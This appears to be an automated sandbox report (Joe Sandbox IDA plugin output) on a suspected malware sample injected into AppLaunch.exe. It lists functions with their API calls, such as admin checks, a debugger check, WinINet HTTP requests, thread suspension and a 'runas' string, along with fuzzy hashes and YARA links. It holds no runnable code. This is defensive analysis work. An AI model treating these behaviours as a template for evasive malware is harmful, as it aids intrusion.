Opcode Fuzzy Hash: 99a8f7e6187273d87de13963f39ec75784b4e1fdce918a97a7133b03ccf2e118
Instruction Fuzzy Hash: A5414970D102089BDB24ABA8DD4A7DEBB75EF45314F4042BEEC00A73C1EB7959908BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1D0 Relevance: 5.1, APIs: 3, Instructions: 627COMMON

Download Yara Rule

APIs

Part of subcall function 00404B50: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00404BA7

Part of subcall function 00405230: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00405286

IsUserAnAdmin.SHELL32 ref: 0040F200

Part of subcall function 00402150: RegOpenKeyExA.ADVAPI32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
Part of subcall function 00402150: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
Part of subcall function 00402150: RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2

GetUserNameW.ADVAPI32(?,?), ref: 0040F283

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: UserVersion$AdminCloseNameOpenQueryValue
String ID:
API String ID: 3568742309-0
Opcode ID: fc10f0e6d48d9d41999febe9695253ee46596c9d1774be56935c431f049f9616
Instruction ID: 318857904b6ae6531e0aee8ebb6e6f46d784888546baca5de6a41ed6081915d8
Opcode Fuzzy Hash: fc10f0e6d48d9d41999febe9695253ee46596c9d1774be56935c431f049f9616
Instruction Fuzzy Hash: 5E52C670E002188BEF24EB64C9997DEBB72AB45308F5041EAD409673C6DB795BC8CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00417C96 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00417D8E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00417D98
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417DA5

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7bb259621451575564cc74585fdf1fd9faebc5539d4cdaaece710669a9e8dcba
Instruction ID: ef4b843b8be3794603e6b46099549393e308f4ae5a5ba1698a6167967c884788
Opcode Fuzzy Hash: 7bb259621451575564cc74585fdf1fd9faebc5539d4cdaaece710669a9e8dcba
Instruction Fuzzy Hash: 5131B1B59013289BCB61DF65D8897D9BBB8BF08314F5041EAE41CA6290E7749FC58F48

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCFB Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041FD3F

Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F8F5
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F907
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F919
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F92B
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F93D
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F94F
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F961
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F973
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F985
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F997
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F9A9
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F9BB
Part of subcall function 0041F8D8: _free.LIBCMT ref: 0041F9CD

_free.LIBCMT ref: 0041FD34

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 0041FD56
_free.LIBCMT ref: 0041FD6B
_free.LIBCMT ref: 0041FD76
_free.LIBCMT ref: 0041FD98
_free.LIBCMT ref: 0041FDAB
_free.LIBCMT ref: 0041FDB9
_free.LIBCMT ref: 0041FDC4
_free.LIBCMT ref: 0041FDFC
_free.LIBCMT ref: 0041FE03
_free.LIBCMT ref: 0041FE20
_free.LIBCMT ref: 0041FE38

Strings

HC, xrefs: 0041FD11

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: HC
API String ID: 161543041-276384469
Opcode ID: ac80b9a0304b14fb56cd6a5416729651f37c40709158871f4e7a19a009ee04ac
Instruction ID: 6c2b2f9c1423f634d5d2e4989a3abe10d3c742480dff3217673163432e99a0de
Opcode Fuzzy Hash: ac80b9a0304b14fb56cd6a5416729651f37c40709158871f4e7a19a009ee04ac
Instruction Fuzzy Hash: 38314F71600705DFDB24AE79E885BE773E4BF00354F24452FE456D6AA1DB38ACC58B18

Uniqueness

Uniqueness Score: -1.00%

Function 00403350 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00431DD0,00000000,00000000,00000000,00000000), ref: 00403402
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00403414
InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 00403427
InternetCloseHandle.WININET(00000000), ref: 00403438
InternetCloseHandle.WININET(00000000), ref: 0040343B
InternetCloseHandle.WININET(00000000), ref: 00403449
InternetCloseHandle.WININET(00000000), ref: 0040344C

Strings

<, xrefs: 00403609
@, xrefs: 00403611

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID: <$@
API String ID: 4294395943-1426351568
Opcode ID: 4fc6b67835ba28b26639925ba14c28df3d3cba1dd228b0d3c93132eb0a0182fc
Instruction ID: ed163326af9c022367dd3e1651a98257ffa9eaaeba18fa9e00627612e580516b
Opcode Fuzzy Hash: 4fc6b67835ba28b26639925ba14c28df3d3cba1dd228b0d3c93132eb0a0182fc
Instruction Fuzzy Hash: 6341E831A10218ABDF14DF64CC85BDE7F79EF45705F20456AE401BB291D7789B418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00419FAA Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00419FC0

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 00419FCC
_free.LIBCMT ref: 00419FD7
_free.LIBCMT ref: 00419FE2
_free.LIBCMT ref: 00419FED
_free.LIBCMT ref: 00419FF8
_free.LIBCMT ref: 0041A003
_free.LIBCMT ref: 0041A00E
_free.LIBCMT ref: 0041A019
_free.LIBCMT ref: 0041A027

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 48a35d0294ca17e8e0444af33e3c47b40be5aca968102de6fceb2b8609402ce3
Instruction ID: eb77e46a4e6e9bfa31741363ca0696c06c00237a0d049092c268abeb54ba950f
Opcode Fuzzy Hash: 48a35d0294ca17e8e0444af33e3c47b40be5aca968102de6fceb2b8609402ce3
Instruction Fuzzy Hash: EE21D67A91010CEFCB05EF95D891CDE7BB8BF08344B1481ABF9159B561EB35EA84CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004116B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 421threadsleepCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00411B4A
CreateThread.KERNEL32 ref: 00411B5B
CreateThread.KERNEL32 ref: 00411B6C
CreateThread.KERNEL32 ref: 00411B7D
CreateThread.KERNEL32 ref: 00411B8E
Sleep.KERNEL32(00007530), ref: 00411BA0

Strings

pLC, xrefs: 00411743
LC, xrefs: 004119DC

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CreateThread$Sleep
String ID: pLC$LC
API String ID: 422425972-273439679
Opcode ID: 564b0c829252ca352ad066acb91ae612b90e021a449d89568ec19e8c063c6283
Instruction ID: 350e014705d43886901086a9a193a86acfdf06e92fd3e787c2a6e0ca18519df9
Opcode Fuzzy Hash: 564b0c829252ca352ad066acb91ae612b90e021a449d89568ec19e8c063c6283
Instruction Fuzzy Hash: CDD17C71F0010457EB18AB78DD86BDD7E239B82304F24821EE515AB3E6E77DA9C1878D

Uniqueness

Uniqueness Score: -1.00%

Function 00413C10 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00413C47
___except_validate_context_record.LIBVCRUNTIME ref: 00413C4F
_ValidateLocalCookies.LIBCMT ref: 00413CD8
__IsNonwritableInCurrentImage.LIBCMT ref: 00413D03
_ValidateLocalCookies.LIBCMT ref: 00413D58

Strings

n=A, xrefs: 00413CF5, 00413CFE, 00413D0F
csm, xrefs: 00413CED
csm, xrefs: 00413D81

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm$n=A
API String ID: 1170836740-3964275029
Opcode ID: 3e9d03e6f6ccb383419928575ddbaac21a39c90a748c5aa50e2fb17525cca3e2
Instruction ID: 366ffd5bc8328fd225cb54282e3971eabccdecd0aec22de41ca3de98d75bbf3b
Opcode Fuzzy Hash: 3e9d03e6f6ccb383419928575ddbaac21a39c90a748c5aa50e2fb17525cca3e2
Instruction Fuzzy Hash: 5051E634A002049FCF14DF69D881ADEBBB5EF44315F14809AE8145B352D739EB85CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00407FCB Relevance: 13.8, APIs: 9, Instructions: 334networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00431DD0,00000000,00000000,00000000,00000000), ref: 00407FF9
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00408018
HttpOpenRequestA.WININET(?,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00408062
HttpSendRequestA.WININET(?,?,?), ref: 00408109
InternetReadFile.WININET(?,?,000003FF,?), ref: 00408194
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040820F
InternetCloseHandle.WININET(?), ref: 0040822D
InternetCloseHandle.WININET(?), ref: 00408232
InternetCloseHandle.WININET(?), ref: 00408237

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 0219bfc53d382201ebe16432ed446dc4bc5b83289787d2085f62792cea373abe
Instruction ID: 1032ec06e87d047a037b850dfe6119b4517cf87dd94c94d89d19c561b5359505
Opcode Fuzzy Hash: 0219bfc53d382201ebe16432ed446dc4bc5b83289787d2085f62792cea373abe
Instruction Fuzzy Hash: 13C1E571A00108ABDB18DF68CE85BDE7B75EF85300F50416EF855A72D1DB399A81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041A37C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0041A3D3
ext-ms-, xrefs: 0041A3E7
BdA, xrefs: 0041A37E

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: BdA$api-ms-$ext-ms-
API String ID: 0-3789593998
Opcode ID: 9df3d8af041b0fb0acc834ca29a1e5c71ca3f6008ef4501e141ea45a13f3b2e7
Instruction ID: a2fdcb114578986d5a87fa8071611b4d04316f5a6d5118550219b0692082a5b6
Opcode Fuzzy Hash: 9df3d8af041b0fb0acc834ca29a1e5c71ca3f6008ef4501e141ea45a13f3b2e7
Instruction Fuzzy Hash: AF212B31B02220ABCB314B24AD48BEF77589F017A4F254523ED16A7391D7B8ED61C5EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041F113 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0041F13D
_free.LIBCMT ref: 0041F216
_free.LIBCMT ref: 0041F243

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: ca01659455fb508c4bd91c1f995e9741b331cd2c3fa6758ffe16814a1a5f40ac
Instruction ID: 5314e4bc209a5114b902aa4e83cc3325d2b27779deee313c7bfda8026c4263c3
Opcode Fuzzy Hash: ca01659455fb508c4bd91c1f995e9741b331cd2c3fa6758ffe16814a1a5f40ac
Instruction Fuzzy Hash: FA51F9B1904209AFDB20EFB59891AEEB7A4AF01314F14417FED2097281DB3D998BC65D

Uniqueness

Uniqueness Score: -1.00%

Function 00415B13 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00415A45), ref: 00415B35
GetFileInformationByHandle.KERNEL32(?,?), ref: 00415B8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00415A45,?,000000FF,00000000,00000000), ref: 00415C1D
__dosmaperr.LIBCMT ref: 00415C24
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00415C61

Part of subcall function 00415E89: __dosmaperr.LIBCMT ref: 00415EBE

Strings

EZA, xrefs: 00415B2D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: EZA
API String ID: 1206951868-3365884641
Opcode ID: cb71046afd0d09b288bb7a465b8dd8535858774d9283fa50bbf20633f1fcd82f
Instruction ID: d9140bdf70c9869e0d47a8e5bcf42d726cde482423235d4808ab002a302bcd39
Opcode Fuzzy Hash: cb71046afd0d09b288bb7a465b8dd8535858774d9283fa50bbf20633f1fcd82f
Instruction Fuzzy Hash: 3A412C75900B04EFDB249FA6DC459EFBBF9EF88304B10452EE956D3610E7389981CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415DDB Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00415E1D

Strings

.bat, xrefs: 00415E4C
.exe, xrefs: 00415E2A
.com, xrefs: 00415E5D
PZA, xrefs: 00415DEA, 00415DF1, 00415E1C
.cmd, xrefs: 00415E3B

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe$PZA
API String ID: 1752292252-2765917712
Opcode ID: edcb7d1334c83e997cfdc33898eaa9ea829e5d0e002e30df8c59506e4174cc1b
Instruction ID: ec0f78f46ee6c46e55da1054bc3dcd7be93c0cf6397bb9fd9222bbbae0651466
Opcode Fuzzy Hash: edcb7d1334c83e997cfdc33898eaa9ea829e5d0e002e30df8c59506e4174cc1b
Instruction Fuzzy Hash: 7301C837B04F26665A14512A6D827EB13998BD1BB472A002FF854E73C1EE4CDE8141DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA77 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FA3F: _free.LIBCMT ref: 0041FA64

_free.LIBCMT ref: 0041FAC5

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 0041FAD0
_free.LIBCMT ref: 0041FADB
_free.LIBCMT ref: 0041FB2F
_free.LIBCMT ref: 0041FB3A
_free.LIBCMT ref: 0041FB45
_free.LIBCMT ref: 0041FB50

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e7617c00cebec1f5be453482f43f9b38169e014d944ab705d91d14773e4429c0
Instruction ID: b04470a26f13dcdf8409fc22173c18865a52ae34292e03d547bb1a44c51b1af0
Opcode Fuzzy Hash: e7617c00cebec1f5be453482f43f9b38169e014d944ab705d91d14773e4429c0
Instruction Fuzzy Hash: 59116D31550B04EBD924BBB2CD47FCB77DCAF00744F44082FB2AD66492EA2CB98B4654

Uniqueness

Uniqueness Score: -1.00%

Function 0041B627 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,004053F0,00000000), ref: 0041B66F
__fassign.LIBCMT ref: 0041B84E
__fassign.LIBCMT ref: 0041B86B
WriteFile.KERNEL32(?,004053F0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B8B3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041B8F3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B99F

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: c82d8b84b24162b4166c50d1c6a0f8f4e1d104b348a4661558084caf8f76d6d6
Instruction ID: 1c8d79e4dc3511047e6628dbd079361964fbf8000fd0a02ffa1a1f8c65647122
Opcode Fuzzy Hash: c82d8b84b24162b4166c50d1c6a0f8f4e1d104b348a4661558084caf8f76d6d6
Instruction Fuzzy Hash: 02D1BEB5D002589FCF15CFA8C8809EDBBB5FF48314F28406AE955BB341D734A982CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414014 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0041400B,00413E79,00413788), ref: 00414022
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00414030
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00414049
SetLastError.KERNEL32(00000000,0041400B,00413E79,00413788), ref: 0041409B

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
Instruction ID: 651763f92c7eaca7bf3c78848c5ca57a44c47bc0da8610db98857e4fd3240ead
Opcode Fuzzy Hash: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
Instruction Fuzzy Hash: 9D01B5326093115DE6282AB6BC857EB2B64EBC9376320033FF718541F1EF595C81518C

Uniqueness

Uniqueness Score: -1.00%

Function 004037F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 004123E0: Concurrency::cancel_current_task.LIBCPMT ref: 00412501

CreateThread.KERNEL32 ref: 00403856
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00403863
SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040386A

Strings

runas, xrefs: 004039AF
IC, xrefs: 00403835

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
String ID: runas$IC
API String ID: 1039963361-4169786464
Opcode ID: d816b2fac8493bef7e983df8ea9bca1b7715045683a2aa19fd470b49bed40a9c
Instruction ID: c98d8b3c52aec822b90c3aff4e966c135d8648390da3e20006d0081df6a0283a
Opcode Fuzzy Hash: d816b2fac8493bef7e983df8ea9bca1b7715045683a2aa19fd470b49bed40a9c
Instruction Fuzzy Hash: 5C41C071210148ABEF18DF28CD85BCD3F6AAF85346F90812AF855972D5C77DD6C08B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E668 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 0041E66D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
